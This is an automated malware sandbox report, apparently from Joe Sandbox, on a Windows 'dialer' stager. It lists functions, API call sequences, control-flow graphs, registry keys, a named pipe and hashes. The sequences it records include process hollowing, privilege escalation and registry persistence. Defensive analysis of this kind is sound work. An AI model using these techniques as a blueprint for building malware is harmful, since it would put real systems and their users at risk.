                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                                Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                                Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Non-executed Functions

                                                                                Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                                Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:826
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 2822 140001ac3 2829 140001a70 2822->2829 2823 14000199e 2826 140001a0f 2823->2826 2827 1400019e9 VirtualProtect 2823->2827 2824 140001b36 2825 140001ba0 4 API calls 2824->2825 2828 140001b53 2825->2828 2827->2823 2829->2823 2829->2824 2829->2828 1994 140001ae4 1995 140001a70 1994->1995 1996 14000199e 1995->1996 1997 140001b36 1995->1997 2000 140001b53 1995->2000 1999 140001a0f 1996->1999 2001 1400019e9 VirtualProtect 1996->2001 2002 140001ba0 1997->2002 2001->1996 2005 140001bc2 2002->2005 2003 140001c04 memcpy 2003->2000 2005->2003 2006 140001c45 VirtualQuery 2005->2006 2007 140001cf4 2005->2007 2006->2007 2011 140001c72 2006->2011 2008 140001d23 GetLastError 2007->2008 2009 140001d37 2008->2009 2010 140001ca4 VirtualProtect 2010->2003 2010->2008 2011->2003 2011->2010 2030 140001404 2103 140001394 2030->2103 2032 140001413 2033 140001394 2 API calls 2032->2033 2034 140001422 2033->2034 2035 140001394 2 API calls 2034->2035 2036 140001431 2035->2036 2037 140001394 2 API calls 2036->2037 2038 140001440 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000144f 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000145e 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000146d 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000147c 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000148b 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000149a 2049->2050 2051 140001394 2 API calls 2050->2051 2052 1400014a9 2051->2052 2053 140001394 2 API calls 2052->2053 2054 1400014b8 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014c7 2055->2056 2057 140001394 2 API calls 2056->2057 2058 1400014d6 2057->2058 2059 1400014e5 2058->2059 2060 140001394 2 API calls 2058->2060 2061 140001394 2 API calls 2059->2061 2060->2059 2062 1400014ef 2061->2062 2063 1400014f4 2062->2063 2064 140001394 2 API calls 2062->2064 2065 140001394 2 API calls 2063->2065 2064->2063 2066 1400014fe 2065->2066 2067 140001503 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 14000150d 2069->2070 2071 140001394 2 API calls 2070->2071 2072 140001512 2071->2072 2073 140001394 2 API calls 2072->2073 2074 140001521 2073->2074 2075 140001394 2 API calls 2074->2075 2076 140001530 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000153f 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000154e 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000155d 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000156c 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000157b 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000158a 2087->2088 2089 140001394 2 API calls 2088->2089 2090 140001599 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015a8 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015b7 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015c6 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015d5 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015e4 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015f3 2101->2102 2104 140005aa0 malloc 2103->2104 2105 1400013b8 2104->2105 2106 1400013c6 NtQueryValueKey 2105->2106 2106->2032 2107 140002104 2108 140002111 EnterCriticalSection 2107->2108 2109 140002218 2107->2109 2110 14000220b LeaveCriticalSection 2108->2110 2114 14000212e 2108->2114 2111 140002272 2109->2111 2113 140002241 DeleteCriticalSection 2109->2113 2110->2109 2112 14000214d TlsGetValue GetLastError 2112->2114 2113->2111 2114->2110 2114->2112 2012 14000216f 2013 140002185 2012->2013 2014 140002178 InitializeCriticalSection 2012->2014 2014->2013 2015 140001a70 2016 14000199e 2015->2016 2020 140001a7d 2015->2020 2017 140001a0f 2016->2017 2018 1400019e9 VirtualProtect 2016->2018 2018->2016 2019 140001b53 2020->2015 2020->2019 2021 140001b36 2020->2021 2022 140001ba0 4 API calls 2021->2022 2022->2019 2830 140002050 2831 14000205e EnterCriticalSection 2830->2831 2832 1400020cf 2830->2832 2833 1400020c2 LeaveCriticalSection 2831->2833 2834 140002079 2831->2834 2833->2832 2834->2833 2835 140001fd0 2836 140001fe4 2835->2836 2837 140002033 2835->2837 2836->2837 2838 140001ffd EnterCriticalSection LeaveCriticalSection 2836->2838 2838->2837 2123 140001ab3 2124 140001a70 2123->2124 2124->2123 2125 14000199e 2124->2125 2126 140001b36 2124->2126 2129 140001b53 2124->2129 2128 140001a0f 2125->2128 2130 1400019e9 VirtualProtect 2125->2130 2127 140001ba0 4 API calls 2126->2127 2127->2129 2130->2125 1984 140001394 1988 140005aa0 1984->1988 1986 1400013b8 1987 1400013c6 NtQueryValueKey 1986->1987 1989 140005abe 1988->1989 1992 140005aeb 1988->1992 1989->1986 1990 140005b93 1991 140005baf malloc 1990->1991 1993 140005bd0 1991->1993 1992->1989 1992->1990 1993->1989 2115 14000219e 2116 140002272 2115->2116 2117 1400021ab EnterCriticalSection 2115->2117 2118 140002265 LeaveCriticalSection 2117->2118 2120 1400021c8 2117->2120 2118->2116 2119 1400021e9 TlsGetValue GetLastError 2119->2120 2120->2118 2120->2119 2023 140001800 2024 140001812 2023->2024 2025 140001835 fprintf 2024->2025 2026 140001000 2027 14000108b __set_app_type 2026->2027 2028 140001040 2026->2028 2029 1400010b6 2027->2029 2028->2027 2121 140002320 strlen 2122 140002337 2121->2122 2131 140001140 2134 140001160 2131->2134 2133 140001156 2135 1400011b9 2134->2135 2136 14000118b 2134->2136 2137 1400011d3 2135->2137 2138 1400011c7 _amsg_exit 2135->2138 2136->2135 2139 1400011a0 Sleep 2136->2139 2140 140001201 _initterm 2137->2140 2141 14000121a 2137->2141 2138->2137 2139->2135 2139->2136 2140->2141 2157 140001880 2141->2157 2144 14000126a 2145 14000126f malloc 2144->2145 2146 14000128b 2145->2146 2148 1400012d0 2145->2148 2147 1400012a0 strlen malloc memcpy 2146->2147 2147->2147 2147->2148 2168 140003150 2148->2168 2150 140001315 2151 140001344 2150->2151 2152 140001324 2150->2152 2155 140001160 50 API calls 2151->2155 2153 140001338 2152->2153 2154 14000132d _cexit 2152->2154 2153->2133 2154->2153 2156 140001366 2155->2156 2156->2133 2158 140001247 SetUnhandledExceptionFilter 2157->2158 2159 1400018a2 2157->2159 2158->2144 2159->2158 2160 14000194d 2159->2160 2164 140001a20 2159->2164 2161 14000199e 2160->2161 2162 140001ba0 4 API calls 2160->2162 2161->2158 2163 1400019e9 VirtualProtect 2161->2163 2162->2160 2163->2161 2164->2161 2165 140001b53 2164->2165 2166 140001b36 2164->2166 2167 140001ba0 4 API calls 2166->2167 2167->2165 2171 140003166 2168->2171 2169 1400032cb wcslen 2242 14000153f 2169->2242 2171->2169 2173 1400034ce 2173->2150 2179 1400033c6 2180 14000346e wcslen 2179->2180 2181 140003484 2180->2181 2182 1400034cc 2180->2182 2181->2182 2184 1400034b6 wcslen 2181->2184 2183 140003591 wcscpy wcscat 2182->2183 2186 1400035c3 2183->2186 2184->2181 2184->2182 2185 140003613 wcscpy wcscat 2188 140003649 2185->2188 2186->2185 2187 14000375e wcscpy wcscat 2190 140003797 2187->2190 2188->2187 2189 140003afe wcslen 2191 140003b0c 2189->2191 2193 140003b4b 2189->2193 2190->2189 2191->2193 2194 140003b36 wcslen 2191->2194 2192 140003c02 wcscpy wcscat 2196 140003c37 2192->2196 2193->2192 2194->2191 2194->2193 2195 140003c87 wcscpy wcscat 2198 140003cc0 2195->2198 2196->2195 2197 140003cfd wcscpy wcscat 2200 140003d44 2197->2200 2198->2197 2199 140003d96 wcscpy wcscat wcslen 2382 14000146d 2199->2382 2200->2199 2205 140003ead 2468 1400014a9 2205->2468 2206 140003fdf 2208 14000145e 2 API calls 2206->2208 2214 140003f44 2208->2214 2210 140003fce 2215 14000145e 2 API calls 2210->2215 2211 140005709 2213 140004071 wcscpy wcscat wcslen 2234 140004140 2213->2234 2214->2211 2214->2213 2215->2214 2217 140003f38 2219 14000145e 2 API calls 2217->2219 2219->2214 2220 140004235 wcslen 2221 14000153f 2 API calls 2220->2221 2221->2234 2222 14000531a memcpy 2222->2234 2223 140004452 wcslen 2629 14000157b 2223->2629 2224 1400046cd wcslen 2226 14000153f 2 API calls 2224->2226 2226->2234 2227 14000145e NtQueryValueKey malloc 2227->2234 2228 140004fb1 wcscpy wcscat wcslen 2229 140001422 2 API calls 2228->2229 2229->2234 2231 14000454a wcslen 2646 1400015a8 2231->2646 2234->2220 2234->2222 2234->2223 2234->2224 2234->2227 2234->2228 2234->2231 2235 1400050f3 2234->2235 2236 14000547c memcpy 2234->2236 2237 1400026e0 9 API calls 